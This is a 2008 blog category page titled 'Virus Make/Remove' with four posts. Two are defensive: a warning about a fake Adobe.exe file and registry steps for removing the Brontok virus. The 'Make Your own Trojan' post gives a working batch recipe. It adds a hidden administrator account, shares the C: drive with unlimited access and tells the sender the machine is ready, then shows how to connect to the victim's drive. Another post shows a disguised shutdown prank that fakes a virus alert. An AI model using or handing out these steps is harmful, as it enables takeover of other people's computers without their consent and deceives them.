JAIMIN WORLD

Journey to Knowledge

Archive for the ‘Virus Make/Remove’ Category

Adobe.exe virus

Posted by jaiminworld on September 23, 2008

If you’ve browsed over Windows Task Manager and noticed a small file by the name of Adobe.exe, you’ve probably brushed it aside as a critical file that is required for Photoshop to work correctly.

While this is perfectly understandable given the unambiguous name of the file, you should remember that not every file is what it claims to be. In the case of Adobe.exe files, what you’re actually seeing is a third party virus, designed to look innocuous with the name of a globally respected company as its alibi.

As you can probably imagine, the hackers who work tirelessly on their virus creations have had to find a way to cloak their malicious files. Particularly in the case of spyware, but also in adware and medium threat viruses too.

If you’ve spotted Adobe.exe, you should take note that there is no such legitimate file – released by Adobe – which has that name. You can take a hint from the name itself. What is Adobe? It’s not a program. It’s not a crucial ImageReady or Dreamweaver executable file. It’s simply a company name.

The same distrust should be applied if you happen to see a Microsoft.exe file floating around your system. Hackers thrive on a breach of trust and by slapping a misleading name on their harmful files; they’re halfway towards doing the damage that they’d love.

You’ll find that a quick scan of your hard drive will swiftly highlight the Adobe.exe file. The problem is that most people opt to assume that the anti-Virus software has made a mistake! Why would it be pointing to a name that you know is safe?

A file doesn’t have to be named Big_Fat_Virus.exe to compromise the security of your computer. In most cases, instances of spyware are designed to replicate system processes in appearance. Of course, you can’t see what’s going on under the surface. And anybody who has had a brief scout around their critical system files is certain to have apprehension about deleting a file which claims to be System32.exe.

The best way to know if you’re affected is to run TWO scans of your hard drive, with two different anti-Virus suites. If both programs return the same Adobe.exe alert – or whatever suspiciously named file that you’re worried about – go right ahead and have the problem rectified.

We’re always being warned about the importance of using the Internet with sufficient protection from malicious users, and it’s because it IS very important.

You should have a strong firewall, capable of dealing with intrusions, and a commercial anti-Virus suite checking email attachments and downloaded files for traces of viruses.

But it’s also crucial that you don’t rely on an anti-Virus suite to do all of the hard work. It’s still a good idea to download a free system clean-up utility – there are many available on the Net – and to run it regularly. This will go a long way to cleaning spyware and adware, and it will also boost your system’s performance.

Always keep an eye out for files which are named after companies and respected IT brands. It’s very rare that one of those organizations will choose to release an executable file with such a vague and misleading name.

Posted in Virus Make/Remove | Tagged: , , , , | 1 Comment »

Remove Brontok Virus Urself

Posted by jaiminworld on September 10, 2008

Remove Brontok Virus Urself : Its the most sticky virus .. u can Remove it be an ethical Hacker.


To enable registry editor :

    Start ur computer in safe mode with command prompt and type the followinf command to enable registry editor :reg delete HKCU\software\microsoft\windows\currentversion\policies\system /v “DisableRegistryTools”
    and run HKLM\software\microsoft\windows\currentversion\policies\system /v “DisableRegistryTools”After this ur registry editor is enable
    Type explorer
    Go to run and type regedit

Open :

    HKLM\Software\Microsoft\Windows\Currentversion\Run\

Delete :

    The entries which contain ‘Brontok’ and ‘Tok-’ words.

>> After that restart ur system.


>> To enable folder option in tools menu click here


>> search *.exe files in all drives (search in hidden files also)
Remove all files which are display likes as folder icon.
Ur computer is completely free from virus brontok.

Posted in Virus Make/Remove | Tagged: , , , | Leave a Comment »

Fack Virus by shortcut file

Posted by jaiminworld on September 10, 2008

How…


This is really not a virus but it displays the comment what U want and then shuts down the computer


Create:

    Create a shortcut (Right click > shortcut)

Type:

    shutdown -s -t 1000 -c “Virus found”

Variables

    -s : For shutdown.
    -t : Time duration to display comment before shutdown.
    -c : For comment.

Name:

    Type shutdown.exe to give the name to the file

Change Icon:

    After above steps Change the Icon of the file if U want

OR


You can paste following code in .bat file also.

    shutdown -s -t 1000 -c “Virus found”

Posted in Virus Make/Remove | Tagged: , , , | Leave a Comment »

Make Your own Trojan

Posted by jaiminworld on September 10, 2008

How…


We will use FOUR command step in making your own trojan in a .bat file.

Command 1 : net user net /add

    It makes a new user called net you can put any name you want…

Command 2 : net localgroup administrators net /add

    This is the command that make your user go to the administrators group. Depending on the windows version the name will be different. If you got an american version the name for the group is Administrators and for the portuguese version is administradores so it’s nice yo know wich version of windows xp you are going to try share.

Command 3 : net share system=C:\ /unlimited

    This commands share the C: drive with the name of system.

Command 4 : net send urip I am ur server

    This commands share the C: drive with the name of system.

 


After send ::

Now that your friend opened your .bat file her system have the C: drive shared and a new administrator user. First we need to make a session with the remote computer with the net use command , you will execute these commands from your dos prompt.

Command 1 : net use \\victimip net

    This command will make a session between you and the victim Of course where it says victim ip you will insert the victim ip.

Command 2 : explorer \\victim ip\system

    And this will open a explorer windows in the share system which is the C: drive with administrators access! Binggo!

Posted in Virus Make/Remove | Tagged: , , | Leave a Comment »